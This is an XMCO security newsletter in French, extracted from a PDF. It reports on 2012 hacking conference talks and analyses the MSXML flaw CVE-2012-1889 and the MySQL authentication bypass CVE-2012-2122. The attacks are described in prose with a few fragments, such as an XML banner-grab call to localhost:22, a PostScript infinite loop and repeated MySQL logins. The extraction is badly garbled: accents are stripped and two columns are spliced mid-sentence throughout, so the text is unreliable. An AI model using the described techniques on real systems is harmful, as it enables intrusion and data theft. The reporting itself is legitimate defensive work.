note.pdf aujourdhui sont :

+ Video + Le phishing ;
http://youtu.be/0Q1Qr9D3Gds + Llicitation par tlphone (phone elicitation) ;

Le monde de la scurit informatique et des cyber attaques


+ Lusurpation dindentit (tail gating/impersonation).
a t pass en revue. Les trois types dattaquant ont t
exposs, savoir les criminels (motivs par largent), les
hacktivistes (motivs par un idal, une cause) et enfin les
gouvernements (motivs par le besoin de possder un pou-
voir sur le peuple).

Mikko Hyponen : Nuclear physics


lost its innocence in 1945.
Computer science lost its
innocence in 2009

Diffrents exemples pour chaque cas ont t prsents. Tout


au long de sa confrence, Mikko Hyponen a dvelopp une
analogie entre le secteur nuclaire et le secteur informa-
tique, quil a rsum dans cette phrase : Nuclear physics Dautres exemples sur les types de mails utiliss pour ra-
lost its innocence in 1945. Computer science lost its inno- liser du phishing, ou les types dappels pour rcuprer des
cence in 2009 ... . Autrement dit : la physique nuclaire a donnes personnelles (numro de carte bancaire, num-
perdu son innocence en 1945 (rfrence Hiroshima, entre ro de scurit sociale, mots de passe, etc.) de victimes,
autres). Linformatique a perdu son innocence en 2009 (en notamment la suite de catastrophes naturelles, ont t
rfrence aux cyber attaques intergouvernementales telles prsents tout au long de la confrence. Un des lments
que Stuxnet). intressants a t ltude statistique mene sur les mots de
passe et la diffrence de choix de ces derniers, selon quil
sagit dun homme ou dune femme.

Aprs un comparatif sur certaines habitudes humaines VS


les actions mener afin de prvenir les risques lis de
telles habitudes, Chris Hadnagy a termin sa prsentation
avec cette phrase Dont wear a gun, wear a clipboard to
get information .

HTML5 Something Wicked This Way Comes


Krzysztof Kotowicz

Nonverbal Human Hacking


Chris Hadnagy
+ Slides
http://hackinparis.com/slides/hip2k12/Krzysztof-html5-so-
methingwickedthiswaycomes.pdf
+ Slides
http://hackinparis.com/slides/hip2k12/Chris.H-SocialEngi-
neer-TheArtofHumanHacking.pdf
+ Video
http://youtu.be/j6CE-te5Fc8

+ Video
http://youtu.be/rYeUFtrdu78
Aprs une session de questions-rponses sur diffrents
aspects de la scurit, les confrences ont repris avec celle
de Krzysztof Kotowicz sur le HTML5. travers cette prsen-
La dernire confrence avant le djeuner a mis laccent sur tation, diverses attaques ont t prsentes. Notamment
le phnomne dingnierie sociale ou social engineering le filejacking qui permet de lire et de rcuprer des fichiers
qui, daprs lex-membre des Anonymous Sparky Blaze, situs sur la machine de la victime, partir dun site web
est le plus gros problme [en informatique, NDLR] au- en HTML5 (via Google Chrome uniquement). Une autre
jourdhui . attaque nomme AppCache poisoning a t prsente.
Chris Hadnagy, un professionnel en ingnierie sociale, a su
avec humour et nergie capter lattention du public sur ce Elle passe par un point daccs dtourn ( rogue access
phnomne qui prend de plus en plus dampleur. A travers 17
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Hack In Paris

point ) et lutilisation des Offline Web Applications :<html Par ailleurs, des vidos ont permis, dune part, de noter
manifest=cache.manifest>. Par ailleurs, une attaque bapti- que les films hollywoodiens sinspirent souvent de cyber
se Silent File Upload permet de charger des fichiers, via attaques existantes, et dautres dautre part, de dmontrer
JavaScript exclusivement, sur des sites de partage de photos que certains composants, exposs une certaine frquence
utiliss par la victime, en utilisant une faille de type Cross pendant un temps donn peuvent tre dtruits. Peut-tre
Origin Resource Sharing . Une dmonstration a t faite un prsage lattaque mene par le ver Flame via diffusion
sur le site Flickr. Dautres attaques ont t prsentes afin de musique (cf. CXA-2012-1354) ?
de faire comprendre les points suivants aux dveloppeurs :
Cette confrence avait un lien intressant avec celle dou-
+ Le langage HTML5 offre plusieurs fonctionnalits int-
ressantes, y compris pour les pirates ;
verture donne par lexpert en scurit Mikko Hypponen qui
lavait fini en dclarant : Nuclear physics lost its innocence
+ Les compromissions ncessitant linteraction de la vic-
time elle-mme sont largement possibles ;
in 1945. Computer science lost its innocence in 2009.

+ Il vaut mieux ne pas utiliser de frames, do la recom-


mandation particulire en conclusion : Use X-Frame-Op- PostScript : Danger Ahead
tions: DENY . Andrei Costin

+ Slides
http://hackinparis.com/slides/hip2k12/Andrei-PostS-
cript%20Danger%20Ahead.pdf

+ Video
http://youtu.be/ygcs0m5C9ZI

Pour terminer cette journe riche en motions, nous avons


assist une confrence sur le PostScript. Mais quest ce
que le PostScript selon Wikipedia ?

Le PostScript est un langage informatique spcialis dans


la description de pages, mis au point par Adobe. Ainsi,
Andrei Costin a dabord prsent le langage avec ses diff-
rentes spcifications. Par exemple, il nous a montr com-
Weapons of Max destructions V4 ment provoquer un dni de service avec une boucle infinie
Jorge Sebastiao ({}loop).

+ Slides
http://hackinparis.com/slides/hip2k12/Jorge-Weapons%20
une attaque baptise
of%20Max%20Destruction%20V40.pdf Silent File Upload permet de charger des
fichiers, via JavaScript
+ Video
http://youtu.be/Ldy9Pi7tGOk
exclusivement, sur des
sites de partage de photos utiliss
Lavant-dernire confrence de la journe ntait pas des
par la victime en utilisant le Cross Origin
plus riches en dcouvertes. Elle avait quand mme le m- Resource Sharing
rite dtre une bonne synthse de ltat actuel des cyber
attaques qui sont de plus en plus cibles, mais surtout d-
ployes par des tats afin den attaquer dautres (cf. Bulle- Le langage permet de faire plusieurs choses comme en-
tin CXA-2012-0934). voyer des requtes ou manipuler nimporte quel document.

Jorge Sebastiao a indiqu que les cyber-guerres sont dac- Les scnarios prsents nont pas t aussi impressionnants
tualit et que les nouvelles armes de destructions massives que lon pouvait imaginer, mais le chercheur a pos une
sont maintenant lectroniques. Stuxnet et Flame avec leur simple question comme Qui vrifie ce quil imprime ?
principe de fonctionnement ont t passs en revue (Le La rponse est personne. Alors, imaginer un langage, incor-
malware Gauss navait pas encore fait parler de lui, cf. CXA- por dans un document qui modifie tous les 0 par des 9 lors
2012-1408.). de limpression...

18
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
A Bit More of PE Attacking XML Processing
Ange Albertini Nicolas Grgoire

+ Video
http://youtu.be/3duSgr5b1yc
+ Slides
http://hackinparis.com/slides/hip2k12/Nicolas-Attacking_
XML_processing.pdf
Le format des fichiers PE, fichier excutable Windows, est
quelque chose de plus compliqu que cela en a lair. Cest
tout du moins ce qua confirm Ange Albertini lors de sa
+ Video
http://youtu.be/xm5hloYTSyI
prsentation. En effet, lors de ltude dun malware, il a
observ des comportements tranges avec certains par- En fin daprs-midi, Nicolas Grgoire nous a prsent une
seurs PE. Cest partir de ce constat quil a dcid de for- confrence intitule Attacking XML Processing . Il a
ger ses propres fichiers PE puis danalyser les diffrentes dabord procd une prsentation gnrale du XML et
ractions des systmes dexploitation et des parseurs PE. un rappel des diffrents usages. Par la suite, pour identifier
Ange nous a ensuite montr plusieurs exemples de fichiers dventuelles vulnrabilits il a pos la question suivante :
PE qui ne respectaient pas les spcifications de Microsoft Le contenu XML est-il interprt ? .
mais qui sexcutaient tout de mme. Ces fichiers malfor-
ms peuvent tre utiliss pour contourner les parseurs de
fichiers des antivirus par exemple. Le projet corkami
lanc par Ange, rfrence tous les fichiers PE qui ne res-
pectent pas les spcifications, afin de les analyser et de
crer une documentation sur leurs spcifications.

Bypassing Android Permission Model


Georgia Weidman

+ Slides
http://hackinparis.com/slides/hip2k12/Georgia-android-
permissions.pdf

+ Video
http://youtu.be/S9eVKyxye2c

Georgia Weidman a prsent la scurit des applications Plusieurs cas dexploitation de vulnrabilits lies linter-
Android, et plus prcisment la gestion des droits de ces prtation dun contenu XML ont t prsents, dmons-
applications. Aprs avoir fait la liste des diffrents droits trations lappui, avec notamment, lencapsulation dun
existants, plusieurs techniques de contournement ont PDF malveillant dans du XML (XDP) qui nest alors plus
t exposes. Une application peut, par exemple, utiliser dtect par les antivirus, un dni de service via une at-
une autre application qui disposerait des droits ncessaires taque Billion Laughs Attack (CWE-776), ou encore la
pour effectuer une action. De plus, les ressources dispo- rcupration de bannires via des messages derreur en
nibles sur la carte SD le sont pour toutes les applications. utilisant la fonction DOMDocument::loadXML() sur
Gare aux fichiers de configuration ! Enfin, de plus en plus des ports correspondant des services connus (exemple
de dveloppeurs demandent lintgralit des droits, mme : DOMDocument::loadXML(https://localhost:22/) pour ob-
si leur application ne les utilise pas (Facebook). tenir la bannire du serveur SSH). Finalement, il nous a
prsent des mthodes avances qui permettent dex-
cuter arbitrairement du code PHP ou Java en utilisant des
documents XSLT.

Got Your Nose! How To Steal Your Precious Data Wit-


hout Using Scripts
Mario Heiderich

+ Slides
http://hackinparis.com/slides/hip2k12/Georgia-android-
permissions.pdf

+ Video
http://youtu.be/S9eVKyxye2c

Mario Heiderich a prsent un sujet assez classique, linjec-


tion de code dans une page web (XSS). Cependant, mme
19
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Hack In Paris

si le sujet est commun, la manire de laborder est atypique


: Mario nous a prsent un certain nombre dattaques utili- http://youtu.be/wZqrSyv4cHs
sables sans aucune utilisation de scripts (injection de codes
HTML et CSS principalement). Dmonstrations lappui,
Mario nous a montr quil tait possible de retrouver un Keynote: Measuring Risk with Time Based Security
mot de passe enregistr dans un navigateur par force brute, Winn Schwartau
ou de raliser un keylogger en injectant du code SVG, puis http://hackinparis.com/slides/hip2k12/Winn-Keynote.pdf
en utilisant la fonction accessKey qui permet dassocier
des vnements la frappe au clavier. Finalement, Mario http://youtu.be/pRdGdG6NwS0
a illustr le fait quune protection du ct client (le plug-in
NoScript de Firefox par exemple) nest pas suffisante pour
prvenir dventuelles attaques. Il faut donc porter les ef- Securing the Internet: YOUre doing it wrong (An
forts de scurisation au sein mme du code de lapplication. INFOSEC Intervention)
Jayson E. Street
http://hackinparis.com/slides/hip2k12/Jayson-secu-
ring%20HIP.pdf
> Hack In Paris : autres confrences
http://youtu.be/vKulXYU-ov4
SCADA Security: Why is it so hard ?
Amol Sarwate
http://hackinparis.com/slides/hip2k12/Amol-SCADASecuri- Questions and Answers : Panel Defensive Nature
tyWhyIsItSoHard.pdf Winn Schwartau, Jayson E. Street, Chris Hadnagy
http://youtu.be/T48WiGQYdF8$
http://youtu.be/wm9NufqoIWU

Questions and Answers : Panel offensive Nature


PostScript: Danger ahead ! Winn Schwartau, Georgia Weidman, Mario Heiderich
Andrei Costin http://youtu.be/fH285SC8Mkc
http://hackinparis.com/slides/hip2k12/Andrei-PostS- qsdqsdqs
cript%20Danger%20Ahead.pdf

http://youtu.be/wm9NufqoIWU

Got your Nose ! How to steal your precious data wit-


hout using scripts
Mario Heiderich
http://hackinparis.com/slides/hip2k12/Mario-got_ur_
nose_hip12.pdf

http://youtu.be/FIQvAaZj_HA

What are the new means for cybercriminals to bypass


and evade your defenses ?
Klaus Majewski
http://hackinparis.com/slides/hip2k12/Klaus%20Stone-
soft_AET.pdf

http://youtu.be/7i0JUplckw8

Results of a Security Assessment of the Internet Pro-


tocol version 6 (IPv6)
Fernando Gont
http://hackinparis.com/slides/hip2k12/Fernando-ipv6-se-
20 curity.pdf
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
> Confrences scurit

Hackito

Cdric Blancher
matique et hacking, a enchan sur les consquences de
> Hackito Ergo Sum la mdiatisation croissante de la scurit informatique et
laugmentation du nombre de confrences dans le domaine
XMCO tait cette anne encore prsent la confrence fran- ces dernires annes. Cette augmentation du nombre de
aise qui monte, Hackito Ergo Sum, ou HES pour les intimes. confrences travers le monde, bien que positive, aurait
Cest au sige du Parti Communiste Franais, lespace Oscar pour consquence ngative de tirer le niveau technique
Niemeyer, que la 3me dition dHES a eu lieu. vers le bas. De plus, il nest pas rare de voir une prsenta-
tion plusieurs confrences diffrentes.
Keynote #1 Enfin, lorateur a termin en expliquant pourquoi le hac-
Cedric Blancher king devait continuer exister. Selon lui, le hacking serait le

+ Slides
http://2012.hackitoergosum.org/blog/wp-content/
moteur de linnovation.

uploads/2012/04/HES-2012-cblancher-Keynote1.pdf

Cdric Blancher a ouvert le bal des prsentations avec la


premire keynote. Apparemment, il a remplac au pied
lev le confrencier prvu et a ainsi abord la dfinition
premire dun terme aujourdhui utilis tort et travers
: hacking . Cette activit consiste tout simplement
adapter quelque chose dexistant un autre besoin. Afin
dillustrer ses propos, Cdric Blancher sest appuy sur un
exemple original : modifier les attaches de son appareil
photo afin de ladapter lactivit extrme quest le para-
chutisme.

Le confrencier a ensuite fait le lien entre scurit infor-


21
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Hardware backdooring is practical mobile afin de mener bien ses recherches.
Jonathan Brossard et Florentin Demetrescu Sur une vido projete, nous avons assist une sorte dat-
taque de Man-in-the-Middle entre un iPhone, une an-
+ Slides
http://2012.hackitoergosum.org/blog/wp-content/
tenne relais malveillante et lantenne relais lgitime. Dans
cette vido, liPhone cibl perd laccs au rseau, puis se re-
uploads/2012/04/HES-2012-jbrossard_fdemetrescu-Hard- connecte lantenne relais malveillante. Un second iPhone
ware-Backdooring-is-pratical.pdf appelle alors liPhone victime qui dcroche tout seul...
Daprs le confrencier, les constructeurs prendraient ces
Jonathan Brossard et Florentin Demetrescu nous ont pr- considrations de scurit au srieux. Le problme principal
sent leur preuve de concept fonctionnelle de backdoor trs proviendrait de la chaine de mise jour.
bas niveau. Les confrenciers ont rapidement pos la ques-
tion de savoir si un tat (la Chine par exemple) aurait les Lorateur a ensuite expos la facilit daccs aux informa-
moyens de backdoorer lensemble des ordinateurs. En tions de certaines puces via linterface JTAG moyennant
ralit, nimporte quelle entreprise participante la chaine lutilisation dune RIFF Box, ainsi que les diffrentes puces
de fabrication dun ordinateur est en mesure de dposer et les tendances du march.
une backdoor.
noter que Ralf Philipp Weinmann est lun des co-auteurs
du livre iOS Hackers Handbook .

Les confrenciers ont rapidement


pos la question de savoir
si un tat aurait les moyens de backdoorer
lensemble des ordinateurs

Strange and Radiant Machines in the PHY Layer


Travis Goodspeed & Sergey Bratus

+ Slides
http://2012.hackitoergosum.org/blog/wp-content/
uploads/2012/04/HES-2012-goodspeed_bratus-StrangeAn-
dRadiant-Machines.pdf

Seul Travis Goodspeed tait prsent la confrence. Celui-ci


a prsent des travaux qui sattaquent la couche la plus
basse du modle OSI : la couche physique et plus particuli-
Cdric Blancher

rement dans le cas des transmissions sans fil.

Lattaque dcrite Packet-in-Packet permet un atta-


quant qui pourrait manipuler les couches les plus hautes
du modle OSI dinjecter des trames au niveau physique.
Le principe est le suivant : il est possible dencapsuler un
Les orateurs ont poursuivi par une brve prsentation de
paquet lintrieur dun autre paquet et dinterprter le
larchitecture x86, ainsi que par une dmo du flash dune
paquet encapsul comme un paquet part entire. Ceci est
carte mre avec coreboot et un tat de lart des prcdents
d notamment au bruit (interfrences) ambiant qui peut
travaux effectus dans le domaine de bootkit.
invalider le paquet extrieur.
Enfin, la dernire partie de la prsentation sest concentre
Le chercheur a accompagn ses propos dune dmonstra-
sur Rakshasa , la backdoor dveloppe par les cher-
tion sur un clavier sans fil Microsoft.
cheurs. Le but tait datteindre la backdoor ultime : persis-
tante, furtive, portable, etc. Une dmonstration de leur outil
a t faite sur un Windows Server 2008. Rakshasa sap-
puie sur : Coreboot, SeaBios, iPXE et de nombreux payloads.
Les chercheurs ont termin sur des pistes de rflexion afin
de prvenir dune telle source dattaque.

Revisiting Baseband Attacks


Ralf Philipp Weinmann

Ralf Philipp Weinmann a prsent ses recherches sur les


attaques des rseaux cellulaires. Le chercheur a notamment
utilis du matriel trouv dans le sous-sol de son univer-
22 sit du Luxembourg pour mettre en place une infrastructure
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Hackito Ergo Sum

Cryptographic Function Identification in Obfuscated tapes suivantes :


Binary Programs 1 - Collecter les traces dexcution de P ;
Joan Calvet 2 - Extraire tous les algorithmes cryptographiques possibles

+
avec leurs paramtres daprs ltape 1 (l rside toute la
Slides difficult) ;
http://2012.hackitoergosum.org/blog/wp-content/ 3 - Identifier ces algorithmes en comparant leurs relations
uploads/2012/04/HES-2012-jcalvet-CryptoFunctionIdentifi- E/S avec ceux des algorithmes connus.
cation.pdf

Joan Calvet a prsent ses recherches sur lidentification des


fonctions cryptographiques au sein de binaires obfusqus. Hacking the NFC credit cards for fun and debit
Le chercheur sest demand comment faire pour recon- Renaud Lifchitz
natre diffrentes implmentations dun mme algorithme.
La technique dveloppe par Joan Calvet sappuie sur la
comparaison des relations entres-sorties dun binaire. En + Slides
http://2012.hackitoergosum.org/blog/wp-content/
effet, pour une cl K et un texte chiffr C, nimporte quelle uploads/2012/04/HES-2012-rlifchitz-contactless-payments-
implmentation de Tiny Encryption Algorithm (exemple insecurity.pdf
pris par lorateur) produit le mme texte dchiffr C.
Larrive du paiement sans contact bas sur la technolo-
Cependant, cette technique est limite, car pour un pro- gie RFID est inexorable. Renaud Lifchitz a prsent ses re-
gramme P implmentant un algorithme cryptographique cherches sur le sujet. Ce mode de paiement dj rpandu
inconnu, il est irralisable de tester toutes les E/S pour prou- aux tats-Unis (10 millions de cartes) est limit 20 euros
ver que P implmente lalgorithme cryptographique A. Au maximum par paiement.
mieux, il est possible de prouver que P implmente lalgo-
rithme A sur les entres testes. A laide dun lecteur de carte RFID, doutils et de rtro-in-
gnierie, Renaud Lifchitz est parvenu extraire les donnes
contenues au sein de la carte tels que le numro PAN, la
Cdric Blancher

date dexpiration, les donnes contenues au sein de la


bande magntique et lhistorique des transactions ban-
caires. Un attaquant possdant un lecteur RFID peut ainsi
rcuprer, et ce, linsu de sa victime les informations ban-
caires susnommes. Renaud a ensuite illustr lattaque par
une dmo au cours de laquelle il extrait avec succs ces in-
formations. La principale limitation de lattaque rside dans
la distance ncessaire pour pouvoir extraire les donnes. La
version du logiciel excutable sur PC a t publie la fin
de la confrence.
Cdric Blancher

Le but du chercheur est ainsi de prouver quun programme


P se comporte comme un algorithme cryptographique
connu durant une excution particulire en suivant les 3
23
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Walter Belgers La confrence a commenc par une prsentation des m-
canismes de scurisation des donnes au sein de liPhone.
+ Slides
http://2012.hackitoergosum.org/blog/wp-content/
Celui-ci repose uniquement sur le mot de passe et pourtant
les smartphones ne sont pas adapts (petit cran, dblo-
uploads/2012/04/HES-2012-wbelgers-Handouts.pdf cage rgulier via le mot de passe) pour configurer un mot
de passe complexe. La suite de la confrence sest axe sur
La premire journe sest termine par une prsentation lanalyse de plusieurs applications disponibles sur lAppS-
sur un domaine connexe la scurit informatique et tradi- tore, qui sont censes stocker de manire scurise les mots
tionnellement reprsent : le lockpicking. de passe de lutilisateur.

Le confrencier, plusieurs fois vainqueur de nombreuses


comptitions de crochetage de serrure, a commenc par
prsenter ce qutait le lockpicking. Lorateur a poursuivi
par lexplication des diffrentes techniques utilisables, du
principe de fonctionnement dune serrure, et des protec-
tions applicables.
Plusieurs dmonstrations faites en direct (ou en vido) ont
eu lieu afin dillustrer les propos de Walter Belgers.

A laide dun lecteur de carte RFID,


doutils et de rtro-ingnierie,
Renaud Lifchitz est parvenu
extraire les donnes contenus
au sein de la carte tels que Ltude rvle assez rapidement que certaines applications
le numro PAN, la date dexpiration, utilisent des algorithmes de chiffrement des fichiers sen-
les donnes contenues sibles (contenant les mots de passe de lutilisateur) consi-
au sein de la bande magntique drs comme facilement cassables, surtout si le mot de
passe global (permettant de dchiffrer le fichier) est faible.
La conclusion des chercheurs tait sans appel, la solution de
How We Compromised the Cisco VoIP Crypto Ecosys- stockage des mots de passe interne liOS, le keychain, est
tem la mthode la plus sre.
Enno Rey et Daniel Mende
`
La prsentation a dbut par un rappel des lments de
scurit mis en place dans le cadre dinfrastructure VoIP et
les vulnrabilits souvent rencontres lors de tests dintru-
sions. Le constat est que le chiffrement des communica-
tions est un lment essentiel pour la confidentialit des
conversations.

Cisco a ainsi implment un systme bas sur les infrastruc-


tures cls publiques qui permet de rpondre ce besoin.
Des dongles CTL contenant les clefs prives sont utiliss
pour signer les certificats utiliss au sein des tlphones
Cisco. Les chercheurs ont identifi une vulnrabilit permet-
tant de modifier le fichier CTL et de mettre jour leur signa-
ture la vole lors dune attaque de Man In The Middle.
Lattaquant injectant ainsi son propre certificat entre les
tlphones peut ensuite dchiffrer la communication.

Secure Password Managers and Military-Grade


Encryption on Smartphones
Andrey Belenko et Dmitry Sklyarov

+ Slides
http://2012.hackitoergosum.org/blog/wp-content/
uploads/2012/04/HES-2012-belenko_sklyarov-Secure-
Password-Managers.pdf

24
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Hackito Ergo Sum

> Hackito Ergo Sum : autres conf- Decomposing the Network to perform Attack Planning
under Uncertainty
rences Carlos Sarraute
Keynote #2
Fyodor Yarochkin The System of Automatic Searching for Vulnerabilities
http://2012.hackitoergosum.org/blog/wp-content/ or how to use Taint Analysis to find security bugs
uploads/2012/04/HES-2012-fyodor-keynote2.pdf Nikita Tarakanov & Alex Bazhanyuk
http://2012.hackitoergosum.org/blog/wp-content/
uploads/2012/04/HES2012-ntarakanov-SASV_ABazhanyuk.
Keynote # pdf
Marc van Hauser Heuse
http://2012.hackitoergosum.org/blog/wp-content/
uploads/2012/04/HES-2012-mheuse-keynote3.pdf Exploiting a Coalmine: Abusing Complex Bugs in Web-
kits RenderArena
Georg Wicherski
Lockpickito Ergo Sum http://2012.hackitoergosum.org/blog/wp-content/
Walter Bergers uploads/2012/04/HES2012-gwicherski-exploiting-a-coal-
http://2012.hackitoergosum.org/blog/wp-content/ mine.pdf
uploads/2012/04/HES-2012-wbelgers-Handouts.pdf

Modern webapp hacking or how to kill a bounty pro-


gram
Itzhak Avraham (Zuk) & Nir Goldshlager
http://2012.hackitoergosum.org/blog/wp-content/
uploads/2012/05/HES-2012-iavraham_ngoldshlager-Mo-
dern_webapp_hacking.pdf

Easy Local Windows Kernel Exploitation


Cesar Cerrudo

Recent Advances in IPv6 Security


Fernando Gont
http://2012.hackitoergosum.org/blog/wp-content/
uploads/2012/04/HES-2012-fgont-recent-advances-in-ipv6-
security.pdf

Strange and Radiant Machines in the PHY Layer


Travis Goodspeed & Sergey Bratus
http://2012.hackitoergosum.org/blog/wp-content/
uploads/2012/04/HES-2012-goodspeed_bratus-StrangeAn-
dRadiant-Machines.pdf

Yo Dawg, I Heard You Like Reversing...


Aaron Portnoy & Brandon Edwards

25
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Hack In Paris vs SSTIC
> Confrences scurit

SSTIC

Cdric Blancher
> SSTIC

Lamphithtre du campus de Rennes Beaulieu tait com-


plet pour cette 10me dition du SSTIC. Toujours aussi riche
en confrences et en rencontres (le Social Event aidant),
cette dition anniversaire a galement t loccasion
de revenir sur des anecdotes marquantes de la dcennie
coule. Nous vous prsentons ci-dessous un florilge de
prsentations marquantes auxquelles nous avons assist.

La suite de cet article est rserve aux abonns du CERT-


XMCO...

26
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
LActualit du moment

Que sest-il pass au cours de ces dernires


semaines au sein du petit monde de la
scurit informatique ?

Ce mois-ci nous reviendrons sur les vuln-


rabilits MS12-043, Bypass MySQL et F5
BIG-IP.
tashland

Analyse de vulnrabilits
Analyse de la faille MS12-043 (CVE-2012-1889)

ACTUA
par Charles DAGOUAT

Buzz

LIT
MySQL (CVE-2012-2122) et F5 BIG-IP (CVE-2012-1493)
par Julien MEYER et Adrien GUINAULT

DU
Le whitepaper du mois
LObservatoire de la scurit des cartes de paiement
par Charles DAGOUAT

MOMENT R&D
ROPGuard et contournements
par Franois LEGUE

Le phishing du mois
AT&T et BlackHole
par Adrien GUINAULT

27
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.

Analyse de la vulnrabi-
lit MS12-043 affectant le
composant MSXML
par Charles DAGOUAT

Volantra
Contexte Cette faille tait alors considre comme tant suffisam-
ment critique pour que le gant de Redmond publie le
Le 30 mai dernier, Google [1] alertait Microsoft de lexploi- 12 juin suivant le bulletin de scurit n2719615 [2] afin
tation par des pirates dune faille de scurit de type 0day dalerter les internautes de lexistence de cette faille de
prsente au sein dInternet Explorer. scurit, de son exploitation par les pirates, et de la mise
disposition dun correctif temporaire sous la forme dun
Fix it (n50908). Daprs les informations alors publies
par Microsoft, la faille provenait du composant MSXML
(Microsoft XML Core Services). Le correctif devait permettre
aux clients de mettre en oeuvre de faon simplifie une
solution de mitigation temporaire les protgeant contre un
attaquant cherchant tirer parti de cette faille. En effet,
lexploitation de cette dernire permettait un attaquant
de prendre distance le contrle dun systme avec les
privilges de lutilisateur courant [2].

Quelques jours plus tard, le 18 juin, les dveloppeurs du


projet Metasploit ajoutaient une premire version dun
code dexploitation [3]. En moins de trois jours, les auteurs
parvenaient le rendre fiable 100% sur les principales
configurations Microsoft : Internet Explorer 6/7/8 et 9, utili-
ses sur Windows XP/Vista, ou encore Windows 7 SP1.

28
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
Il faudra ensuite attendre le 9 juillet pour que Microsoft Rfrences
publie, dans le cadre de son Patch Tuesday du mois, le
correctif MS12-043 [4] corrigeant la faille de scurit rf-
rence CVE-2012-1889 [5] pour les versions 3, 4 et 6 du
composant vulnrable sous Windows, mais laissant la ver-
+ Rfrences CERT-XMCO
CXA-2012-1018, CXA-2012-1207, CXA-2012-1046
sion 5 utilise au sein de Microsoft Office 2003 et 2007 sans
correctif. +[1] Alerte Google
http://googleonlinesecurity.blogspot.com.es/2012/06/
security-warnings-for-suspected-state.html et http://goo-
Description de la faille gleonlinesecurity.blogspot.co.uk/2012/06/microsoft-xml-
vulnerability-under.html
Cette faille de scurit affecte les versions 3, 4, 5 et 6 de la
librairie partage MSXML. En incitant un internaute visiter
une page Internet spcialement conue, un pirate tait en
+ [2-4] Alerte et bulletin Microsoft
http://technet.microsoft.com/en-us/security/adviso-
mesure de provoquer une corruption de la mmoire me- ry/2719615
nant la compromission du systme. http://technet.microsoft.com/en-us/security/bulletin/
ms12-043
La faille provient plus prcisment de la fonction _
dispatchImpl::InvokeHelper . En effet, en situation nor-
male, cette fonction, lorsquelle est appele, initialise cor-
+ [3] Exploit Metasploit
http://dev.metasploit.com/redmine/projects/framework/
rectement le contenu dune structure de type vTable repository/revisions/master/entry/modules/exploits/win-
(Note 1) avant dutiliser cette dernire pour appeler une dows/browser/msxml_get_definition_code_exec.rb
fonction virtuelle. Cependant, sous certaines conditions,
celle-ci peut ne pas tre initialise, provoquant ainsi une
erreur lorsque le programme cherche appeler une fonc-
+ [5] Rfrence CVE
h t t p : // c v e . m i t r e . o r g / c g i - b i n / c v e n a m e .
tion non dfinie ladresse en question. Dans cette situa- cgi?name=CVE-2012-1889
tion, il est possible pour un attaquant de contrler ladresse
en question, menant ainsi la compromission du systme. + [6-7] Analyses de la socit HTBridge
https://www.htbridge.com/publications/cve_2012_1889_
Note (1) : lorsquun programme est dvelopp en C++ ou microsoft_xml_core_services_uninitialized_memory_
dans nimporte quel langage de programmation orient ob- vulnerability.html
jet supportant le mcanisme de dynamic dispatch , une
structure de type vTable contient les pointeurs vers les https://www.htbridge.com/publications/cve_2012_1889_
fonctions virtuelles dfinies au sein des diffrentes classes security_update_analysis.html
hritant dune mme superclasse parente. Cette table per-
met au systme, lors de lexcution du programme, dex-
cuter limplmentation de la fonction associe linstance
+ [8] Analyse de VUPEN
http://www.vupen.com/blog/20120717.Advanced_Exploi-
de classe manipule. tation_of_Internet_Explorer_XML_CVE-2012-1889_MS12-
http://en.wikipedia.org/wiki/Virtual_method_table 043.php
La vulnrabilit a t prsente en dtail par Brian Mariani
et Frederic Bourla dHigh-Tech Bridge [6] [7], ainsi que par
Nicolas Joly de VUPEN [8] (allez Florent, la prochaine cest
+ [9] Analyse de Corelan
https://www.corelan.be/index.php/2011/12/31/exploit-
pour toi! ;-). Corelanc0d3r prsente en dtail le scnario writing-tutorial-part-11-heap-spraying-demystified/
dexploitation associ ce type de faille [9].

+ Autres rfrences
http://blog.trendmicro.com/technical-analysis-of-cve-
Exploitation de la faille 2012-1889-exploit-html_exployt-ae-part-1/

Il est relativement simple de dclencher la faille. Pour cela, http://blog.trendmicro.com/technical-analysis-of-cve-


les quelques lignes de code HTML et JavaScript composant 2012-1889-exploit-html_exployt-ae-part-2/
la preuve de concept suivante sont suffisantes.
http://blog.trendmicro.com/technical-analysis-of-cve-
2012-1889-exploit-html_exployt-ae-part-3/
rences
La suite de cet article est rserve aux abonns du http://blog.eset.com/2012/06/20/cve2012-1889-msxml-
CERT-XMCO... use-after-free-vulnerability

http://blogs.mcafee.com/mcafee-labs/vulnerability-in-mi-
crosoft-xml-core-services-opens-door-to-attackers

http://www.symantec.com/connect/blogs/cve-2012-1889-
action
29
Ce document est la proprit du cabinet XMCO. Toute reproduction est strictement interdite.
MySQL et Bypass ROOT
par Julien MEYER

Scott McLeod
Le 9 juin 2012, Sergei Golubchik, en charge de la scurit Mais comment est-ce possible ?
pour le projet MariaDB a publi un avis de scurit sur la
liste de diffusion SecList . Les dveloppeurs de MySQL ont cr la fonction de compa-
MySQL et MariaDB sont tous deux vulnrables une at- raison des mots de passe sans prendre en compte une don-
taque permettant de contourner la phase dauthentifica- ne importante. En effet, la fonction memcmp , utilise
tion, et ceci distance. pour la comparaison des mots de passe, renvoie une va-
riable de type integer. Daprs la page de manuel, le pro-
La vulnrabilit a t identifie sous la rfrence CVE-2012- totype de la fonction est le suivant : int memcmp(const
2122. void *s1, const void *s2, size_t n); .

Lexploitation de cette vulnrabilit


Lexploitation, le cas MySQL est trs simple, puisquil suffit de raliser de
nombreuses tentatives
Lexploitation de cette vulnrabilit est trs simple, puisquil
suffit de raliser de nombreuses tentatives de connexion de connexion la base de donnes.
la base de donnes. Avec un nom dutilisateur existant et Avec un nom dutilisateur existant
un mot de passe alatoire, il est alors possible de forcer le et un mot de passe alatoire,
systme qui valide le mot de passe, mme si celui-ci nest il est alors possible de forcer le systme qui
pas bon. Etrange non ? valide le mot de passe, mme si celui-ci nest
